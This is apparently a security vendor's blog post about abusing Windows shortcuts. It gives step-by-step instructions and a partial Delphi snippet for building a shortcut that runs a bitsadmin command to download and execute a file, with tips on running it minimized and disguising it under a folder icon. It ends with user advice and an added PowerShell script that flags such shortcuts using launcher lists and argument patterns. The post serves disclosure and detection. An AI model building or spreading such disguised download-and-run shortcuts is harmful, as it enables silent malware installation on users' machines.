We came across a way of installing malware on a Microsoft Windows operating system using the well-known shortcut system that nearly everybody uses and blindly trusts.
Because of its very nature, it is quite hard to detect, and removal might be even more difficult.
- A shortcut isn't a binary executable file, at least not directly, since it usually points to another location such as a folder or file. However, it can also execute Windows shell commands (a potentially very dangerous feature, but one that is often used for administrative tasks such as system shutdown/logoff/restart directly from a regular shortcut).
- Since a shortcut isn't a binary executable, an antivirus program will not flag such a shortcut as possibly malicious.
- Shortcuts can be shared through archive files without losing their properties.
- Finally, you can easily change the icon and disguise the malicious shortcut with a folder icon or an image. This could help spread the malware via social media.
To describe this threat, we shall first describe a native Windows program called the BITSAdmin Tool, which has been embedded in Windows since Windows XP SP2. Follow this MSDN link for more information about what it is used for and how to use it.
Basically, this command line tool was designed to create download tasks and to monitor their progress. Offering such a command line is very dangerous, since Bitsadmin.exe is of course signed by Microsoft, is trusted by antivirus software, and can perform a download in a single command line.
Example of BITSAdmin command
bitsadmin /transfer downloader /priority normal https://phrozensoft.com/uploads/2016/09/Winja_2_6084_65441_setup.exe %temp%\setup.exe
This command downloads an application file hosted on our servers into the Windows temporary folder.
Now let's use this command line tool to build a new Windows shortcut that abuses it.
DIY, the manual way
Right click somewhere in Explorer (for example on a free space on your desktop), then click 'Create a new shortcut'.
Enter the following command line:
cmd.exe /C "%windir%\System32\bitsadmin.exe /transfer downloader /priority normal https://phrozensoft.com/uploads/2016/09/Winja_2_6084_65441_setup.exe %temp%\setup.exe & %temp%\setup.exe"
When the shortcut has been successfully created, we edit its properties (right click on the shortcut, then select Properties).
Switch the 'Run' option to 'Run Minimized'. This makes the console window less noticeable, since it is minimized to the taskbar as soon as it launches (and stays there during the file download).
Finally, you can update the icon with the one of your choice (for example a folder icon). To keep the icon when you share the shortcut, it is recommended to use shell32.dll as the icon source, since shell32.dll is natively available on any Windows system.
shell32.dll is not the only file containing icons on a Microsoft system: ieframe.dll, imageres.dll, pnidui.dll, wmploc.dll and others also have many useful icons.
Congratulations, your first malicious shortcut is now ready.
DIY, programmatically (Delphi)
uses ActiveX, ShlObj, ComObj;

function MaliciousLnk(fileUrl, destFile : String) : Boolean;
var
  cObject   : IUnknown;
  shellLink : IShellLink;
  PFile     : IPersistFile;
  Cmd       : String;
begin
  Result := False;
  { Create the ShellLink COM object and query the interfaces we need }
  cObject   := CreateComObject(CLSID_ShellLink);
  shellLink := cObject as IShellLink;
  PFile     := cObject as IPersistFile;
  { Command line the shortcut would hand to cmd.exe; building it is all the
    published snippet does, the target/argument assignment is not shown }
  Cmd := '/C "c:\windows\system32\bitsadmin.exe /transfer downloader /priority normal "' + fileUrl + '" %temp%\tmp.exe & %temp%\tmp.exe"';
  { Persist the shortcut to disk; S_OK means the file was written }
  Result := PFile.Save(PWideChar(destFile), False) = S_OK;
end;
bitsadmin.exe is just one example of what you can do with a Windows shortcut; basically you can do anything malicious that can be done from a command line, such as:
- Using any regular Windows DOS commands
- Using PowerShell to run malicious code
- Using the Windows Subsystem for Linux embedded in Windows 10, for those who have enabled it
- Using rundll32.exe to call exported DLL functions
Never blindly trust shortcuts you encounter. They might hide malicious code that your favourite antivirus software does not detect, and the end result might be a compromised or locked system. Take the time to open the properties of an unknown shortcut and see which command line it would try to execute. If you have any doubt, remove it!
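Checking shortcut properties one by one is tedious, so here is an added example (not part of the original post) that automates the inspection described above: it reads every .lnk under a folder through the standard WScript.Shell COM object and reports those whose target is a command interpreter, whose arguments mention a downloader or a %temp% staging path, or that are set to run minimized behind a system icon. The function name and the list of flagged launchers are our own choices.

```powershell
# Added example: report .lnk files that show the traits described in the post.
# Reads shortcut properties via WScript.Shell; nothing in the shortcut is executed.
function Find-SuspiciousLnk {
    param([Parameter(Mandatory)][string]$Path)

    # Interpreters and proxies a "folder" or "image" shortcut has no reason to target
    $launchers = 'cmd.exe','powershell.exe','pwsh.exe','wscript.exe','cscript.exe',
                 'rundll32.exe','mshta.exe','bitsadmin.exe','wsl.exe','bash.exe'
    # Argument fragments typical of the download-then-run pattern
    $argPattern = 'bitsadmin|/transfer|powershell|rundll32|wsl\.exe|%temp%|\.exe\s*&'
    $wsh = New-Object -ComObject WScript.Shell

    Get-ChildItem -Path $Path -Filter *.lnk -Recurse -File -ErrorAction SilentlyContinue |
    ForEach-Object {
        $lnk     = $wsh.CreateShortcut($_.FullName)
        $target  = [System.IO.Path]::GetFileName($lnk.TargetPath).ToLowerInvariant()
        $reasons = @()

        if ($launchers -contains $target) {
            $reasons += "target is a command interpreter ($target)"
        }
        if ($lnk.Arguments -match $argPattern) {
            $reasons += "arguments reference a downloader or a %temp% staging path"
        }
        # WindowStyle 7 is 'Run Minimized', the setting the post recommends
        if ($lnk.WindowStyle -eq 7) {
            $reasons += "configured to run minimized"
        }
        # A console launcher hiding behind a stock shell32/imageres icon
        if (($launchers -contains $target) -and ($lnk.IconLocation -match 'shell32\.dll|imageres\.dll')) {
            $reasons += "system icon borrowed by a console launcher"
        }

        if ($reasons.Count -gt 0) {
            [PSCustomObject]@{
                Path      = $_.FullName
                Target    = $lnk.TargetPath
                Arguments = $lnk.Arguments
                Reasons   = ($reasons -join '; ')
            }
        }
    }
}

# Usage: scan the current user's desktop and show every finding with its reasons
Find-SuspiciousLnk -Path "$env:USERPROFILE\Desktop" | Format-List
```

A shortcut flagged only for running minimized is not necessarily malicious; the combination of an interpreter target, download arguments and a borrowed icon is what matches the technique in this post.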